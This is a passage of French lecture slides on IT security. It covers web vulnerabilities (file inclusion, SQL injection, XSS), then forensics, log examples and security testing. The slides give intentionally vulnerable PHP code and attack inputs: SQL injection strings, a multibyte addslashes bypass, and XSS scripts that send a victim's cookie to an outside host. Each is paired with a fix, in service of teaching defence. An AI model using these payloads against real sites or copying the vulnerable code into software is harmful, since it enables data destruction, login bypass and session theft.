périmètre principal : les bases de données
fournit des résultats "clairs" sur des données chiffrées

[Link]@[Link] Sécurité Informatique/ November 28, 2021 357 / 506

URLographie

[Link]
[Link]
[Link]
[Link]

[Link]@[Link] Sécurité Informatique/ November 28, 2021 358 / 506

Une faille c’est quoi ?

Un programme fait ce qu’on lui demande

pas plus pas moins
avec les éléments qu’on lui fournit
comment fait-il quand il se trouve dans des conditions non
prévues ?

[Link]@[Link] Sécurité Informatique/ November 28, 2021 359 / 506

Injection : Condition normale

Je vais dans une boulangerie. En condition normale (en omettant

le paiement) :

Elle m’a demandé une variable : le nombre de baguettes.

[Link]@[Link] Sécurité Informatique/ November 28, 2021 360 / 506

Injection : Le pirate
Le pirate entre dans une boulangerie.

Elle m’a demandé une variable, le pirate répond avec une variable
... suivie d’un ordre. Si le programme n’a pas prévu le cas, c’est
foutu.
Une solution ?

[Link]@[Link] Sécurité Informatique/ November 28, 2021 361 / 506

Débordement : Condition normale

En condition normale, je dépose ma commande à la boulangerie :

La serveuse traite les commandes, puis reprend la liste des choses à

faire.

[Link]@[Link] Sécurité Informatique/ November 28, 2021 362 / 506

Débordement : Le pirate
Le pirate dépose sa commande en espérant que la pile de sa
commande va déborder sur la liste des choses à faire

Bingo !!

[Link]@[Link] Sécurité Informatique/ November 28, 2021 363 / 506

Les applications web

Les failles d’un site web.

[Link]@[Link] Sécurité Informatique/ November 28, 2021 364 / 506

Problème générique des failles

Les failles sont dues à l’utilisation imprévue d’une variable pour

obtenir un comportement inattendu, mais contrôlé, plus ou moins
correctement, par le pirate.
La plupart des intrusions sur des sites web, contrairement à ce que
montre le cinéma, sont dûes à l’utilisation de failles de sécurité.
Les serveurs web étant souvent les seuls points accessibles, voyons
comment cela peut se passer.

[Link]@[Link] Sécurité Informatique/ November 28, 2021 365 / 506

Structure d’un service web

[Link]@[Link] Sécurité Informatique/ November 28, 2021 366 / 506

20 points de vulnérabilités

Du schéma précédent, on peut trouver 20 points de vulnérabilités :

Les logiciels
Les serveurs
Les scripts
Les modules
Les outils de protection (antivirus, antispyware, etc.)
Les OS
Les matériels
Les communications
L’utilisateur
Les protocoles

[Link]@[Link] Sécurité Informatique/ November 28, 2021 367 / 506

Les types de paramètres

Variables GET. Elles sont données dans l’URL de demande.

Variables POST. Fournies par un formulaire.
Variables Cookies. Variables conservées par le navigateur sur
son disque dur et généralement fournies par le serveur.
Variables SERVER (HTTP_USER_AGENT ou
HTTP_REFERER)

[Link]@[Link] Sécurité Informatique/ November 28, 2021 368 / 506

Les variables GET

Décrites dans l’URL.

[Link]
Ici 2 variables p et hl, avec les valeurs html et fr.
Généralement provenant d’une interrogation directe.
Dans le cas présent, plutôt rare, il s’agit d’envoi par formulaire
(method=GET).

[Link]@[Link] Sécurité Informatique/ November 28, 2021 369 / 506

Les variables POST

Remplies par un formulaire.

Utilisées quand on a un grand volume de données à envoyer.
Utilisées quand on a un grand nombre de variables.
Non tracées par les journaux des daemons (hormis modules
spécifiques).
Traitement particulier des variables Hidden qui sont cachées
pour l’utilisateur, mais pas pour le navigateur.

[Link]@[Link] Sécurité Informatique/ November 28, 2021 370 / 506

Les variables cookies

Notion de valise de variables stockées sur le client

Transmises de manière transparente dans la requête
C’est le serveur qui est sensé positionner ces variables pour
une durée limitée
Un serveur ne peut généralement (sauf faille de sécurité)
demander à accéder qu’aux variables :
Qu’il a lui-même positionnées.
Qu’une machine de son domaine a positionnées (et si celle-ci
l’a explicitement autorisé).

[Link]@[Link] Sécurité Informatique/ November 28, 2021 371 / 506

Les variables SERVER

Ces variables sont hétéroclites.

Celles que seul le serveur connait
Version du serveur
Répertoire de travail
Celles qui sont associées à la connexion
L’adresse du client REMOTE_ADDR
L’hôte appelé
Le port source
Celles qui proviennent du client
Le Referer : HTTP_REFERER
Le USER_AGENT
L’URL appelée

[Link]@[Link] Sécurité Informatique/ November 28, 2021 372 / 506

MUV : principe fondamental

Ces variables proviennent en majorité du client.

Il a donc tout pouvoir pour les modifier, effacer.
Les contrôles Javascript sont exécutés par le client ( s’il le
souhaite ! ).
Les contrôles de formulaire (taille, type) sont exécutés par le
client ( s’il le souhaite ! ).

[Link]@[Link] Sécurité Informatique/ November 28, 2021 373 / 506

MUV : Généralisation : Injection de code

Faille de sécurité : faire exécuter du code informatique

Ce code va être injecté par une "interface" pas prévue pour
Ce code dépend de qui va l’éxecuter et du vecteur d’injection

Nom Langage Vecteur Interpréteur/Victime

Buffer Overflow Assembleur Binaire Processeur
SQL Injection SQL web SGBD
LDAP Injection LDAP web annuaire LDAP
Injection shell, DOS, etc. web Interpréteur backoffice
XSS Javascript web navigateur
CSRF HTML web navigateur
script PDF Javascript PDF lecteur PDF

[Link]@[Link] Sécurité Informatique/ November 28, 2021 374 / 506

MUV : Quelques exemples

Variables sur les noms de fichier (ou les répertoires)

Variables dites superglobales
Variables dans les requêtes SQL (ou LDAP ou tout
interpréteur)
Variables pour du XSS

[Link]@[Link] Sécurité Informatique/ November 28, 2021 375 / 506

MUV : Sur les noms de fichiers

Exemple d’inclusion.
Soit le programme PHP suivant
<?
include ("[Link]");
$page=$_GET[’page’]; # On récupère la variable "page"
include ($page);
include ("[Link]");
?>
que l’on utilise de la manière suivante
Utilisation
[Link]

[Link]@[Link] Sécurité Informatique/ November 28, 2021 376 / 506

MUV : Sur les noms de fichiers

Quelques attaques :
Exemples simples d’utilisation malveillante
[Link]
[Link]
page=[Link]

On pourrait de la même manière utiliser les fonctions fopen,

require, etc.

[Link]@[Link] Sécurité Informatique/ November 28, 2021 377 / 506

MUV :Solution

Refuser les requêtes avec des caractères dangereux

<?
If (eregi("/",$page))
{die("Va jouer dans le mixer !")}
include ("[Link]");
include ($page);
include ("[Link]");
?>
On doit aussi utiliser
La notion de "allow_url_fopen" et "allow_url_include" du
[Link] en les mettant à faux,
La notion de "open_basedir" en listant les répertoires autorisés
Empêcher l’utilisateur apache de sortir (avec un firewall en
sortie), on pourra aussi bloquer MySQL et proftpd.

[Link]@[Link] Sécurité Informatique/ November 28, 2021 378 / 506

MUV : Les injections SQL (ou LDAP)

Le SQL est un langage d’interrogation de base de données. C’est

un véritable langage de programmation, avec ses fonctions, ses
variables, ses commentaires.
Le principe des appels SQL en WWW, est que le langage (PHP
par exemple) crée une chaine de caractères (la commande SQL)
qui est ensuite envoyée au SGBD.
Le SGBD interprète et exécute le programme envoyé.

[Link]@[Link] Sécurité Informatique/ November 28, 2021 379 / 506

MUV : Les injections SQL ou LDAP

Utilisation
[Link]

Code du programme
$id=$_GET[’id’];
$sql_query="DELETE FROM matable WHERE id=$id";
mysql_connect($database);
mysql_query($database,$sql_query);

[Link]@[Link] Sécurité Informatique/ November 28, 2021 380 / 506

MUV : Les injections SQL première attaque

Les espaces doivent être remplacés par %20 en cas de GET

[Link] OR 1=1

ce qui nous donne

Chaine envoyée au SGBD
DELETE FROM matable WHERE id=3 OR 1=1
Le résultat est la destruction de tous les enregistrements.

[Link]@[Link] Sécurité Informatique/ November 28, 2021 381 / 506

MUV : Les injections SQL 1bis

Code du programme
<?
$id=$_GET[’id’];
$sql_query="DELETE FROM matable WHERE id=$id AND user=’USER1’";
mysql_connect($database);
mysql_query($database,$sql_query);
?>

[Link]@[Link] Sécurité Informatique/ November 28, 2021 382 / 506

MUV : Les injections SQL attaque 1bis

On ajoute un commentaire
[Link] OR 1=1 --

ce qui nous donne :

Chaine envoyée au SGBD
DELETE FROM matable WHERE id=3 OR 1=1 -- AND champ1=true

Le résultat est la destruction de tous les enregistrements, car la fin

du WHERE n’est pas prise en compte.

[Link]@[Link] Sécurité Informatique/ November 28, 2021 383 / 506

MUV : Les injections SQL attaque 1ter

Un commentaire peut suffire

[Link] --

ce qui nous donne :

Chaine envoyée au SGBD
SELECT uid FROM user WHERE login=fabrice@[Link] -- AND password=

Le résultat est une identification sans mot de passe.

[Link]@[Link] Sécurité Informatique/ November 28, 2021 384 / 506

MUV : Les injections SQL attaque 1ter

Même chose avec un formulaire

ce qui nous donne :

Chaine envoyée au SGBD
SELECT uid FROM user WHERE login=fabrice@[Link] -- AND password=

Le résultat est une identification sans mot de passe.

[Link]@[Link] Sécurité Informatique/ November 28, 2021 385 / 506

MUV : Les injections SQL première solution

La première solution peut consister à modifier le programme en

ajoutant des quotes
Code du programme
$sql_query="DELETE FROM matable WHERE id=’$id’";

Le résultat de la première attaque devient alors

Code du programme
DELETE FROM matable WHERE id=’3 OR 1=1’

qui est sans danger.

Mais pourtant une faille existe encore

[Link]@[Link] Sécurité Informatique/ November 28, 2021 386 / 506

MUV : Les injections SQL deuxième attaque

Insérons une quote

[Link] OR 1=1 --

ce qui nous donne

Chaine envoyée au SGBD
DELETE FROM matable WHERE id=’3’ OR 1=1 -- ’

Le résultat est encore la destruction de tous les enregistrements.

[Link]@[Link] Sécurité Informatique/ November 28, 2021 387 / 506

MUV : Les injections SQL deuxième solution

La solution va passer par 2 possibilités

le magic_quotes_gpc à on (ATTENTION : les versions de
PHP influent !)
la fonction addslashes (idem)

Code du programme
$id=add_slashes($id);
$sql_query="DELETE FROM matable WHERE id=’$id’";

L’attaque précédente donne alors

Chaine envoyée au SGBD
DELETE FROM matable WHERE id=’3\’ OR 1=1’

Qui ne fait plus rien. Mais ce n’est toujours pas fini. Une faille
existe malgré cela.

[Link]@[Link] Sécurité Informatique/ November 28, 2021 388 / 506

MUV : Les injections SQL troisième attaque

Le but de magic_quotes_gpc est à ON. Mais il a des problèmes

avec les caractères dits "multibytes" : c’est à dire les alphabets
plus complexes (chinois ou coréen par exemple)
A la place de la quote, plaçons le caractère multibyte ’0xbf27’ .
Cela ne peut réellement se faire que par un script :
Parlons coréen
$id=chr(0xbf).chr(0x27)." OR 1=1";
fopen([Link]

[Link]@[Link] Sécurité Informatique/ November 28, 2021 389 / 506

MUV : Les injections SQL troisième attaque

Le PHP reçoit un caractère multibyte coréen 0xbf27

Il l’envoie à addslashes (ou à magic_quotes_gpc, ce qui est
identique)
Celui-ci ne comprenant pas que c’est un caractère multibytes,
croit voir 2 caractères : 0xbf et 0x27 qui est une quote. Il
ajoute à 0x27 un antislash (0x5c).
La chaine renvoyée à PHP est donc 0xbf5c27.
Comme PHP renvoie à MySQL qui lui comprend le multibyte
(si la BD est en UTF8), et que 0xbf5c est un caractère
valide, il nous reste 0x27 qui est... la quote.

[Link]@[Link] Sécurité Informatique/ November 28, 2021 390 / 506

MUV : Les injections SQL troisième attaque

On obtient alors la chaine suivante :

Chaine envoyée au SGBD
DELETE FROM matable WHERE id=’3 ’ OR 1=1’
Le résultat est encore la destruction de tous les enregistrements.
Solutions :
mysql_real_escape_string().
les requêtes préparées.

[Link]@[Link] Sécurité Informatique/ November 28, 2021 391 / 506

Et si c’était possible ?

[Link]@[Link] Sécurité Informatique/ November 28, 2021 392 / 506

Et bien si en fait !

Je fais le malin.

[Link]@[Link] Sécurité Informatique/ November 28, 2021 393 / 506

MUV : Les variables de session

Les variables de session permettent de mettre les variables

habituellement mises en cookies, uniquement sur le serveur
Cela évite de trimbaler beaucoup d’informations.
On n’a plus à les contrôler à chaque fois (elles ne sont plus
modifiables).
Seule reste une variable dans le cookie : celle qui contient le
numéro de session. En général, cette variable est équivalente à un
identifiant (on ne réauthentifie plus la personne).
Pour un pirate, c’est le cookie à obtenir.

[Link]@[Link] Sécurité Informatique/ November 28, 2021 394 / 506

MUV : Voler un cookie : Attaque

Soit un forum avec une zone de texte quelconque.

Si on saisit
Salut les potes, le cours est génial, le prof est <B>super</B>.
Reviendez....
On obtient donc
Salut les potes, le cours est génial, le prof est super.
Reviendez....

[Link]@[Link] Sécurité Informatique/ November 28, 2021 395 / 506

MUV : Voler un cookie : Problème

Et si on saisit ?
<script>
while (1)
alert("Vas téter la prise électrique");
</script>

[Link]@[Link] Sécurité Informatique/ November 28, 2021 396 / 506

MUV : Voler un cookie : Problème

Soyons plus méchant :

Récupérons le cookie
<script>
cookie=[Link]();
i=new image();
[Link]="[Link]
</script>

[Link]@[Link] Sécurité Informatique/ November 28, 2021 397 / 506

MUV : Voler un cookie : Solution

Bloquer la chaine "<script" dans les messages.

[Link]@[Link] Sécurité Informatique/ November 28, 2021 398 / 506

MUV : Voler un cookie : Vraiment la solution ?

Comment s’écrit script ?

"<script"
"<javascript"
"<JAVAscript"
"<java script"
"<java
script
et ça ?
<cript>

[Link]@[Link] Sécurité Informatique/ November 28, 2021 399 / 506

MUV : Pire encore ?

un javascript s’appelle aussi par

Par erreur
<img src=Y onerror="[Link]= ’[Link]

Spécifique IE
<bgsound onpropertychange="code Javascript">

[Link]@[Link] Sécurité Informatique/ November 28, 2021 400 / 506

MUV : XSS = solution globale

Il faut utiliser sur toutes les variables externes

GET, POST,
HTTP_REFERER, HTTP_USER_AGENT
dans les Cookies (même si on les a déjà contrôlées)
la fonction htmlentities().

[Link]@[Link] Sécurité Informatique/ November 28, 2021 401 / 506

MUV : XSS = vol de cookie ?

Ce n’est qu’une possibilité, par la transformation du navigateur.

Mais en quoi ?

[Link]@[Link] Sécurité Informatique/ November 28, 2021 402 / 506

En outil de DOS HTTP : JS-LOIC

[Link]@[Link] Sécurité Informatique/ November 28, 2021 403 / 506

Et moi ?

[Link]@[Link] Sécurité Informatique/ November 28, 2021 404 / 506

Et si on intégrait tout ça ?

[Link]

[Link]@[Link] Sécurité Informatique/ November 28, 2021 405 / 506

Un constat difficile

Un constat
beaucoup d’applications sont livrées "telles quelles"
il y a souvent un historique lourd
les applications sont "mouvantes".
les développeurs ne sont pas souvent formés.

[Link]@[Link] Sécurité Informatique/ November 28, 2021 406 / 506

Des solutions globales

D’où des solutions "globales"

des IPS réseau pour bloquer
des modules de sécurité
en négatif : mod_security (apache)
en positif : naxsi (nginx)
parfois directement sur le serveur à protéger
souvent utilisés en reverse-proxy.

[Link]@[Link] Sécurité Informatique/ November 28, 2021 407 / 506

L’authentification

Différence identification et authentification

Multi-facteurs ou pas
Sur quels périmètres
Accès aux machines
Accès aux applications
Accès au réseau
SSO : Same Sign On ou Single Sign On ?

[Link]@[Link] Sécurité Informatique/ November 28, 2021 408 / 506

Méthodes d’authentification

Locale (Fichiers, SQL)

Radius (historique, multiprotocoles, AAA)
LDAP et Active Directory (parfois en backend)
Kerberos (SSO général, mal implémenté par Microsoft)
SSO Web Intra-organisation (CAS)
SSO Trans-organisations (Shibboleth, Oauth)

[Link]@[Link] Sécurité Informatique/ November 28, 2021 409 / 506

Les mécanismes physiques

Ce que l’on a
FIDO et Yubikey
RSA SecurID
Ce que l’on est
lecture d’empreintes digitales (ou de carte veineuse)
lecture d’iris de l’oeil
reconnaissance du visage
vitesse de frappe sur les touches

[Link]@[Link] Sécurité Informatique/ November 28, 2021 410 / 506

Définition et objectifs

Le "forensic computing", parfois abrégé en "forensic" est un terme

anglosaxon reprenant le terme de "médecine légale".
Deux buts sont poursuivis dans le "forensic" ou la "forensique".
Comprendre ce qui s’est passé (comprendre, apprendre, réagir)
Récupérer des preuves ce qui peut se décomposer en
Récupérer des arguments (informels, non juridiques)
Se défendre (devant la justice, ou dans le cadre du RGPD)
Porter plainte
Ces 2 objectifs principaux peuvent être contradictoires (une
réaction rapide entrainant parfois un allégement du cadre formel)

[Link]@[Link] Sécurité Informatique/ November 28, 2021 411 / 506

Mécanismes

Précaution initiale : Nous ne sommes pas toujours sur que le

problème soit une intrusion. Des problèmes entre la chaise et le
clavier génèrent souvent plus de dégâts qu’un pirate. Cependant,
nous devons considérer le cas le pire : le piratage informatique.
Toute agression informatique laisse des traces
Ces traces peuvent être effacées (efficacement ou non) par le
pirate
L’investigation doit éviter au maximum de "piétiner la scène
de crime"

[Link]@[Link] Sécurité Informatique/ November 28, 2021 412 / 506

Mécanismes en cas de juridique

Les juges sont des humains comme les autres : aussi

(in)compétent en informatique
Les juges peuvent se faire assister par des experts judiciaires
(souvent) compétents
Les avocats "adverses" tenteront de dénigrer la valeur de vos
preuves.
Ce qui veut dire
Eviter au maximum d’écrire sur le matériel analysé (pour
permettre de faire une contre-expertise propre)
Marquer et dater toutes vos actions.
Si possible, faites une empreinte (hash) des données (images
etc.)

[Link]@[Link] Sécurité Informatique/ November 28, 2021 413 / 506

Mécanismes génériques

La récupération :
froide ou chaude ? morte ou vivante ? In vivo, In vitro ?
De toute manière, cela se prépare.
physiquement (du matériel, des logiciels)
intellectuellement (des procédures, de l’entrainement)
psychologiquement (de l’entrainement)
juridiquement (un règlement intérieur, une analyse juridique)

[Link]@[Link] Sécurité Informatique/ November 28, 2021 414 / 506

L’analyse chaude

C’est quoi ?
On laisse l’intrusion se dérouler
On analyse le plus en direct possible ce qui se passe
Capture de la mémoire à un instant T
Analyse des flux réseaux (sonde, etc.)
Analyse des actions
Tentative d’interception de ce trafic

[Link]@[Link] Sécurité Informatique/ November 28, 2021 415 / 506

L’analyse chaude

Pourquoi ?
Le pirate a sans doute déjà fait du déplacement latéral
On peut comprendre ce qu’il sait et récupérer des IoC
(indicateurs de compromission) que l’on utilisera plus tard
On pourra toujours faire de l’analyse froide après.
Pourquoi pas ?
C’est dangereux (risque de perte de preuves)
Cela nécessite des compétences plus élevées
Cela nécessite des matériels et logiciels adaptés
Il faut mettre en place des procédures de protection "en live"
et sans trop alerter le pirate
C’est très très stressant.

[Link]@[Link] Sécurité Informatique/ November 28, 2021 416 / 506

L’analyse froide

C’est quoi ?
On coupe tout
On analyse sereinement les disques, les journaux et les traces.
Pourquoi ?
C’est moins risqué pour le SI (cryptolockeur destructeur de
sauvegardes)
C’est moins compliqué.
C’est moins risqué pour les preuves.
Pourquoi pas ?
On va perdre des informations

[Link]@[Link] Sécurité Informatique/ November 28, 2021 417 / 506

L’analyse tiède

C’est quoi ?
Tout ce qui peut-être entre les deux
Pourquoi ?
Parce que rien n’est absolu
Comment ?
Cela va dépendre de la situation.
Passer en hibernation les postes compromis (on conserve une
partie de l’image de la mémoire) pour l’envoyer à un
prestataire.
Complètement "firewaller" la zone compromise et bloquer.
etc.

[Link]@[Link] Sécurité Informatique/ November 28, 2021 418 / 506

Effacer est-il réellement efficace ?

TP : Clé USB
Outils
photorec
recuva

[Link]@[Link] Sécurité Informatique/ November 28, 2021 419 / 506

La copie de la mémoire

Outils
Directe : dump2it
Indirecte (hibernation) : hib2dmp

[Link]@[Link] Sécurité Informatique/ November 28, 2021 420 / 506

L’analyse de la mémoire

Outils
Volatility (sous linux)

[Link]@[Link] Sécurité Informatique/ November 28, 2021 421 / 506

Les copies de disque

Les copieurs "write blockers" hardware

version chère
version pas chère
Les copieurs "nowrite" logiciels
driver linux opensource
logiciel commercial

[Link]@[Link] Sécurité Informatique/ November 28, 2021 422 / 506

L’analyse de disque

TP : Caine & Lazagne

Outils
Caine
Lazagne
Autopsy

[Link]@[Link] Sécurité Informatique/ November 28, 2021 423 / 506

Les traces réseau

Journalisez tout ce que vous pouvez !

En central.
Sur un serveur "invulnérable"
Avec une horloge fiable.

[Link]@[Link] Sécurité Informatique/ November 28, 2021 424 / 506

Schéma d’un réseau classique

[Link]@[Link] Sécurité Informatique/ November 28, 2021 425 / 506

Schéma d’une connexion classique

[Link]@[Link] Sécurité Informatique/ November 28, 2021 426 / 506

Les traces réseau : quoi ?

Les authentifications
Les méta-données de communications
Les "indicateurs" de communication
C’est souvent HAUTEMENT réglable.

[Link]@[Link] Sécurité Informatique/ November 28, 2021 427 / 506

Les traces réseau : les communications firewall(argus)

[Link].468878 e tcp [Link].62165 -> [Link].https 16 6481 CON [Link].476641 e tcp

[Link].43132 <?> [Link].https 2 206 CON [Link].479878 e udp [Link].37776 <->
[Link].https 10 3975 CON [Link].480635 e tcp [Link].55253 -> [Link].http
24 33916 FIN [Link].484520 e tcp [Link].59130 -> [Link].https 22 10317 RST [Link].498224
e tcp [Link].https <?> [Link].43003 4 1500 CON [Link].530973 e tcp [Link].64901
-> [Link].https 15 5439 CON

[Link]@[Link] Sécurité Informatique/ November 28, 2021 428 / 506

Les traces réseau : les blocages firewall

Feb 27 [Link] fenrir kernel: IN=eth0 OUT= MAC=[Link]

SRC=[Link] DST=[Link] LEN=40 TOS=0x00 PREC=0x00 TTL=49 ID=17762
PROTO=TCP SPT=9123 DPT=22 WINDOW=48279 RES=0x00 SYN URGP=0
Feb 27 [Link] fenrir kernel: IN=eth0 OUT= MAC=[Link]
SRC=[Link] DST=[Link] LEN=40 TOS=0x00 PREC=0x00 TTL=48 ID=57510
PROTO=TCP SPT=38809 DPT=23 WINDOW=46009 RES=0x00 SYN URGP=0 MARK=0x1
Feb 27 [Link] fenrir kernel: IN=eth0 OUT= MAC=[Link]
SRC=[Link] DST=[Link] LEN=60 TOS=0x00 PREC=0x00 TTL=46 ID=5136 DF
PROTO=TCP SPT=55378 DPT=22 WINDOW=14600 RES=0x00 SYN URGP=0
Feb 27 [Link] fenrir kernel: IN=eth0 OUT= MAC=[Link]
SRC=[Link] DST=[Link] LEN=52 TOS=0x00 PREC=0x00 TTL=51 ID=40452 DF
PROTO=TCP SPT=56633 DPT=2323 WINDOW=14600 RES=0x00 SYN URGP=0

[Link]@[Link] Sécurité Informatique/ November 28, 2021 429 / 506

Les traces réseau : le proxy

1550976502.075 116 [Link] TCP_MISS/200 2113 POST

[Link] - HIER_DIRECT/[Link] text/xml
1550976502.118 36 [Link] TCP_MISS/302 428 POST
[Link] - HIER_DIRECT/[Link] -
1550975385.578 42 [Link] TCP_MISS/206 1042635 GET
[Link]
HYK6mjXA8u8_32.0.0.142/32.0.0.142_win64_PepperFlashPlayer.crx3?cms_redirect=yes&mip=[Link]
&mm=28&mn=sn-gxo5uxgjqbe&ms=nvh&mt=1550975066&mv=u&pl=20&shardbypass=yes -
HIER_DIRECT/[Link] application/octet -stream
1550975490.272 60239 [Link] TCP_TUNNEL/200 4135 CONNECT [Link] -
HIER_DIRECT/[Link] -
1550975878.275 60233 [Link] TCP_TUNNEL/200 3960 CONNECT [Link] -
HIER_DIRECT/[Link] -

[Link]@[Link] Sécurité Informatique/ November 28, 2021 430 / 506

Les traces réseau : le serveur WWW

[Link] - - [25/Feb/[Link] +0100] "GET /[Link] HTTP/1.1" 200 489 "-"

"Mozilla/5.0 (compatible; bingbot/2.0; +[Link]
[Link] - - [25/Feb/[Link] +0100] "GET / HTTP/1.1" 200 21123 "-"
"Mozilla/5.0 (compatible; bingbot/2.0; +[Link]
[Link] - - [25/Feb/[Link] +0100] "GET /[Link] HTTP/1.1" 200 106 "-"
"CFNetworkAgent (unknown version) CFNetwork/902.3.1 Darwin/17.7.0 (x86_64)"
[Link] - - [25/Feb/[Link] +0100] "GET /css/[Link] HTTP/1.1" 200 45875 "-"
"Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko)
Version/7.0 Mobile/11A465 Safari/9537.53 BingPreview/1.0b"
[Link] - - [25/Feb/[Link] +0100] "GET /images/[Link] HTTP/1.1" 304 - "-"
"Googlebot-Image/1.0"
[Link] - - [25/Feb/[Link] +0100] "GET /doc/reseau/wifi/mode_securise?do=media&ns=
reseau%3Awifi&tab_files=upload HTTP/1.1" 200 8124 "-"
"Mozilla/5.0 (compatible; SemrushBot/3~bl; +[Link]

[Link]@[Link] Sécurité Informatique/ November 28, 2021 431 / 506

Les traces réseau : Le DNS

07-Feb-2019 [Link].776 client @0x7f48aa8ebad0 [Link]#44561 ([Link]): query:

[Link] IN A + ([Link])
07-Feb-2019 [Link].779 client @0x7f48aa8ebad0 [Link]#40610 ([Link]): query:
[Link] IN A + ([Link])
07-Feb-2019 [Link].794 client @0x7f48aa8ebad0 [Link]#60972 ([Link]):
query: [Link] IN A + ([Link])
07-Feb-2019 [Link].807 client @0x7f48aa8ebad0 [Link]#47493 ([Link]):
query: [Link] IN A + ([Link])
07-Feb-2019 [Link].867 client @0x7f48aa8ebad0 [Link]#61548 ([Link]): query:
[Link] IN A + ([Link])

[Link]@[Link] Sécurité Informatique/ November 28, 2021 432 / 506

Les traces réseau : un AD

2 Oct 17 [Link] [Link] Security-Auditing: 4662: AUDIT_SUCCESS

Une opération a été effectuée sur un objet. Sujet : ID de sécurité :
S-1-5-21-3578475232-3819614856-2404772047-52163 Nom du compte : prigent Domaine du
compte : AD ID d’ouverture de session : 0x1EB53A4 Objet : Serveur de l’objet : DS Type d’objet :
%f30e3bc2-9ff0-11d1-b603-0000f80367c1 Nom de l’objet : %14d3bd37-cb93-4a0b-a4b6-650ccf8319f3
ID du handle : 0x0 Opération : Type d’opération : Object Access Accès : Propriété d’écriture
Masque d’accès : 0x20 Propriétés :
Propriété d’écriture 771727b1-31b8-4cdf-ae62-4fe39fadf89e bf967a76-0de6-11d0-a285-00aa003049e2
32ff8ecc-783f-11d2-9916-0000f87a57d4 f30e3bc2-9ff0-11d1-b603-0000f80367c1
Informations supplémentaires : Paramètre 1: - Paramètre 2 :

[Link]@[Link] Sécurité Informatique/ November 28, 2021 433 / 506

Les traces réseau : la messagerie

Feb 7 [Link] [Link] postfix/qmgr[1960]: 99C361CA8428: from=<titi@[Link]>,

size=6245, nrcpt=1 (queue active)
Feb 7 [Link] [Link] postfix/smtpd[1956]: disconnect from
[Link][[Link]]
Feb 7 [Link] [Link] dspam[2986]: innocent message from [Link]
Feb 7 [Link] [Link] lmtp[17514]: sieve redirected: <1549518322154.62927@[Link]>
to: toto@[Link]
Feb 7 [Link] [Link] lmtp[17514]: Delivered: <1549518322154.62927@[Link]>
to mailbox: [Link]
Feb 7 [Link] [Link] postfix/pickup[10644]: B42E61CA84CC: uid=76
from=<titi@[Link]>
Feb 7 [Link] [Link] postfix/cleanup[17040]: B42E61CA84CC: message
-id=<1549518322154.62927@[Link]>
Feb 7 [Link] [Link] postfix/lmtp[2240]: 99C361CA8428: to=<toto@[Link]>,
orig_to=<[Link]@[Link]>, relay=[Link][[Link]]:10024, delay=2.2,
delays=1.6/0/0.05/0.62, dsn=2.6.0, status=sent (250 2.6.0 <toto@[Link]> Message accepted
for delivery)
Feb 7 [Link] [Link] postfix/qmgr[1960]: 99C361CA8428: removed
Feb 7 [Link] [Link] postfix/qmgr[1960]: B42E61CA84CC: from=<titi@[Link]>,
size=7936, nrcpt=1 (queue active)
Feb 7 [Link] [Link] postfix/smtpd[1514]: connect from
[Link][[Link]]

[Link]@[Link] Sécurité Informatique/ November 28, 2021 434 / 506

Les traces : les aides à la preuve et à la détection

Les honeytokens (données fausses insérées par le propriétaire)

Les honeypots (faux serveurs créés par le propriétaire)

[Link]@[Link] Sécurité Informatique/ November 28, 2021 435 / 506

Vérifier sa sécurité

Vérifier sa sécurité.

[Link]@[Link] Sécurité Informatique/ November 28, 2021 436 / 506

Vérifier sa sécurité

Etre persuadé que sa sécurité est efficace n’est pas suffisant : il

faut à minima vérifier que cela correspond à la réalité.
Vérifier que les outils de sécurité sont actifs
Vérifier que les procédures de sécurité sont suivies
Permettre aux utilisateurs de découvrir leurs outils de sécurité
Vérifier notre e-réputation
Faire tester sa sécurité.

[Link]@[Link] Sécurité Informatique/ November 28, 2021 437 / 506

Vérifier que les outils de sécurité sont actifs

Vérifier les antivirus grâce [Link]

Déclenchent-ils des alertes sur le poste ?
sur le serveur de messagerie ?
sur le proxy web ?
Vérifier les ports ouverts grâce à ShieldUp de [Link]
Vérifier le niveau de chiffrement avec [Link]

[Link]@[Link] Sécurité Informatique/ November 28, 2021 438 / 506

Vérifier que les procédures sont actives

Les antivirus sont-ils à jour ? Comment le voit-on ?

Les infections virales remontent-elles sur la console centrale ?
Y-a-t-il des remontées d’alarmes (syslog par exemple) en cas
de problème ?
Les filtres d’url fonctionnent-ils ?
Les vérifications de procédures sont-elles régulières et
automatiques ?
etc.

[Link]@[Link] Sécurité Informatique/ November 28, 2021 439 / 506

Aider les utilisateurs à vérifier leur sécurité

Pourquoi ?
Leur montrer comment réagissent leurs outils de sécurité (et
ainsi éviter les "fake").
Leur faire prendre conscience de la sécurité,
Les rendre autonomes,
Les rendre "détecteurs d’incident".
Comment ?
Déclencher une alerte avec [Link] pour l’antivirus
Tester le firewall local avec [Link]
Voir le repérage des spams, phishing, etc.

[Link]@[Link] Sécurité Informatique/ November 28, 2021 440 / 506

Vérifier son e-réputation

Pourquoi ?
Parce que c’est une valeur importante de l’entreprise,
Parce ce que cela peut faciliter ou compliquer voire interdire
la communication avec les clients.
Comment ?
Voir la réputation mail avec
mxtoolbox pour savoir si l’on est blacklisté
backscatter pour repérer nos refus de mails fautifs
chez CISCO
Voir la réputation web avec
chez McAfee
Avons nous une zone DNS propre ?

[Link]@[Link] Sécurité Informatique/ November 28, 2021 441 / 506

Les moteurs de recherche

Comment nous voit les moteurs de recherche et Internet ?

Google repère-t-il des .bak, .tmp, etc. chez nous ?
Quels sont les mots-clés associés à notre domaine ?
Peut-on trouver des failles de sécurité associées à nos sites
web ?

[Link]@[Link] Sécurité Informatique/ November 28, 2021 442 / 506

Faire tester sa sécurité

Mais tester soi-même n’est pas toujours suffisant : des entreprises

spécialisées sont là pour cela.
Ce sont des experts (souvent),
Ils ont les outils pour (et le droit de les utiliser),
Ils délivrent des rapports lisibles,
Ils savent ce qu’ils ont le droit de faire.
Règles chez Amazon

[Link]@[Link] Sécurité Informatique/ November 28, 2021 443 / 506

Faire tester sa sécurité

Mais attention :
Vérifiez que vous avez le droit de tester (serveur mutualisé ou
hébergé),
Vérifiez la compétence (réputation, autres clients, etc.),
Ne pas choisir l’option "je paye uniquement si vous trouvez"
(les 0days s’achètent !!!)
Définissez bien le périmètre (géographique, opérationnel,
temporel etc.),
TEST = RISQUE,
Plus vous en savez, mieux vous serez servis.

[Link]@[Link] Sécurité Informatique/ November 28, 2021 444 / 506

Les sujets connexes

Par manque de temps, ces sujets n’ont pas été traités. Ils sont
indiqués afin que vous puissiez vous renseigner dessus.
